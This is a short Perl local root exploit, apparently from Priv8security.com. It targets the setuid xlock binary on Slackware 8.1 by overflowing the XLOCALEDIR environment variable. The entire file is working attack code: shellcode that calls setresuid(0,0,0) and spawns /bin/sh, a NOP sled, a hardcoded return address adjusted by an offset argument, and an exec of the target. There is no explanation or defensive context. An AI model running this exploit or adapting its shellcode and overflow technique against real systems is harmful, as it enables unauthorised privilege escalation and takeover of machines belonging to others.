#!/usr/bin/perl ###################################################### #Priv8security.com xlock local root exploit. # # Tested on Slackware 8.1 only. # try offsets 0 , 100, 200, 300 ........ ##################################################### $path = '/usr/X11R6/bin/xlock'; #$path = '/usr/X11R6/bin/xterm'; #$path = '/usr/X11R6/bin/xscreensaver'; $shellcode = # setresuid(0,0,0); "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80". "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69". "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; $retaddr = 0xbffff274; $nop = "\x90"; $offset = 0; if (@ARGV == 1) { $offset = $ARGV[0]; } print " Priv8security.com Slackware 8.1 xlock local root exploit!!\n"; print " usage: $0 offset\n"; print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n"; $new_ret= pack('l', ($retaddr + $offset)); $buffer .= $nop x (2052 - length($shellcode)); $buffer .= $shellcode; $buffer .= $new_ret x 10; $buffer .= $nop x (2100 - length($shellcode)); local($ENV{'XLOCALEDIR'}) = $buffer; exec("$path");